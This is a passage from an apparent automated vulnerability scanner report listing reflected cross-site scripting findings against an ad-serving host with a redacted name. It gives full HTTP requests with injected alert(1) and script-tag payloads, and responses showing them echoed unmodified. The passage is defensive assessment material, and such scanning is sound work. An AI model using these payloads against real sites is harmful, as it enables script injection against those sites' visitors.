GET /AVE/iview/266925773/directc7fa1'%3bf5f2bbdc305;wi.120;hi.600/01/6802161163?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7268
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:27:13 GMT

<html>
<head>
<title>STND_Holiday_Pillow_GG_120x600_nonCT_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style=
...[SNIP]...
<param name="movie" value="HTTP://ec.atdmt.com/ds/AAAVETPICTPI/2010Holiday/STND_Holiday_Pillow_GG_120x600_nonCT.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/266925773/directc7fa1';f5f2bbdc305;wi.120;hi.600;ai.189249189;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/266925773/directc7fa1';f5f2bbdc305;wi.120;hi.600;ai.189249189;ct.1/01" />
...[SNIP]...

2.661. http://redcated/AVE/iview/266925773/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /AVE/iview/266925773/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4ea5'-alert(1)-'25b0e37eac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AVE/iview/266925773/direct;wi.120;hi.600/01/6802161163?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=&e4ea5'-alert(1)-'25b0e37eac1=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7263
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:27:08 GMT

<html>
<head>
<title>STND_Holiday_Pillow_GG_120x600_nonCT_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style=
...[SNIP]...
78791296.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=&e4ea5'-alert(1)-'25b0e37eac1=1');
}
else
{
_strContentTPI3953978791296 = '<a target="_blank" href="http://clk.atdmt.com/go/266925773/direct;wi.120;hi.600;ai.189249189;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/c
...[SNIP]...

2.662. http://redcated/AVE/iview/266925773/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /AVE/iview/266925773/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 407d4"-alert(1)-"d72e3936b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AVE/iview/266925773/direct;wi.120;hi.600/01/6802161163?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=&407d4"-alert(1)-"d72e3936b13=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7262
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:27:07 GMT

<html>
<head>
<title>STND_Holiday_Pillow_GG_120x600_nonCT_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style=
...[SNIP]...
78791296_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=&407d4"-alert(1)-"d72e3936b13=1",
clickThruUrl: "http://clk.redcated/go/266925773/direct;wi.120;hi.600;ai.189249189;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

2.663. http://redcated/AVE/iview/266925773/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /AVE/iview/266925773/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a40c"><script>alert(1)</script>a79c28c0f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AVE/iview/266925773/direct;wi.120;hi.600/01/6802161163?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=&4a40c"><script>alert(1)</script>a79c28c0f6=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7332
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:27:06 GMT

<html>
<head>
<title>STND_Holiday_Pillow_GG_120x600_nonCT_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style=
...[SNIP]...
89249189;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=&4a40c"><script>alert(1)</script>a79c28c0f6=1\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=&4a40c">
...[SNIP]...

2.664. http://redcated/AVE/iview/266925773/direct [wi.120;hi.600/01/6802161163?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /AVE/iview/266925773/direct

Issue detail

The value of the wi.120;hi.600/01/6802161163?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a9e5"-alert(1)-"6cb883e8977 was submitted in the wi.120;hi.600/01/6802161163?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AVE/iview/266925773/direct;wi.120;hi.600/01/6802161163?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=7a9e5"-alert(1)-"6cb883e8977 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7278
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:27:03 GMT

<html>
<head>
<title>STND_Holiday_Pillow_FreeSuprima_120x600_nonCT_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<bo
...[SNIP]...
115879820_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=7a9e5"-alert(1)-"6cb883e8977",
clickThruUrl: "http://clk.redcated/go/266925773/direct;wi.120;hi.600;ai.190921293;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.665. http://redcated/AVE/iview/266925773/direct [wi.120;hi.600/01/6802161163?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /AVE/iview/266925773/direct

Issue detail

The value of the wi.120;hi.600/01/6802161163?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ab16"><script>alert(1)</script>970db46c40 was submitted in the wi.120;hi.600/01/6802161163?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AVE/iview/266925773/direct;wi.120;hi.600/01/6802161163?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=8ab16"><script>alert(1)</script>970db46c40 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7352
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:27:02 GMT

<html>
<head>
<title>STND_Holiday_Pillow_FreeSuprima_120x600_nonCT_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<bo
...[SNIP]...
190921293;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=8ab16"><script>alert(1)</script>970db46c40\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=8ab16">
...[SNIP]...

2.666. http://redcated/AVE/iview/266925773/direct [wi.120;hi.600/01/6802161163?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /AVE/iview/266925773/direct

Issue detail

The value of the wi.120;hi.600/01/6802161163?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 958ec'-alert(1)-'2ece21f0113 was submitted in the wi.120;hi.600/01/6802161163?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AVE/iview/266925773/direct;wi.120;hi.600/01/6802161163?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=958ec'-alert(1)-'2ece21f0113 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7282
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:27:05 GMT

<html>
<head>
<title>STND_Holiday_Pillow_FreeSuprima_120x600_nonCT_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<bo
...[SNIP]...
115879820.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000708689/mnum=0000924397/cstr=45713465=_4ce92c26,6802161163,708689^924397^1^0,1_/xsxdata=$XSXDATA/bnum=45713465/optn=64?trg=958ec'-alert(1)-'2ece21f0113');
}
else
{
_strContentTPI2087115879820 = '<a target="_blank" href="http://clk.atdmt.com/go/266925773/direct;wi.120;hi.600;ai.190921293;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/cli
...[SNIP]...

2.667. http://redcated/CNT/iview/194067507/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/194067507/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97b23'%3bc5f4c88940c was submitted in the REST URL parameter 4. This input was echoed as 97b23';c5f4c88940c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067507/direct97b23'%3bc5f4c88940c;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7539
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:19:26 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCP9/11_7_2010_ct_pt2/110710_22_UTV_THDVR_39_50B_TAG_300x250.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/194067507/direct97b23';c5f4c88940c;wi.300;hi.250;ai.189501321;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/194067507/direct97b23';c5f4c88940c;wi.300;hi.250;ai.189501321;ct.1/01" />
...[SNIP]...

2.668. http://redcated/CNT/iview/194067507/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067507/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14a41"-alert(1)-"b8e2c46097e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067507/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=&14a41"-alert(1)-"b8e2c46097e=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7532
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:19:11 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
84968941_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=&14a41"-alert(1)-"b8e2c46097e=1",
clickThruUrl: "http://clk.redcated/go/194067507/direct;wi.300;hi.250;ai.189501321;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

2.669. http://redcated/CNT/iview/194067507/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067507/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f604b'-alert(1)-'77db039f020 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067507/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=&f604b'-alert(1)-'77db039f020=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7530
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:19:15 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
84968941.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=&f604b'-alert(1)-'77db039f020=1');
}
else
{
_strContentCP91288884968941 = '<a target="_blank" href="http://clk.atdmt.com/go/194067507/direct;wi.300;hi.250;ai.189501321;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/c
...[SNIP]...

2.670. http://redcated/CNT/iview/194067507/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067507/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2952c"><script>alert(1)</script>8d80e36f9c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/194067507/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=&2952c"><script>alert(1)</script>8d80e36f9c8=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7607
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:19:08 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
89501321;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=&2952c"><script>alert(1)</script>8d80e36f9c8=1\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=&2952c">
...[SNIP]...

2.671. http://redcated/CNT/iview/194067507/direct [wi.300;hi.250/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067507/direct

Issue detail

The value of the wi.300;hi.250/01?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4288"><script>alert(1)</script>b5a60ac0fab was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/194067507/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=e4288"><script>alert(1)</script>b5a60ac0fab HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
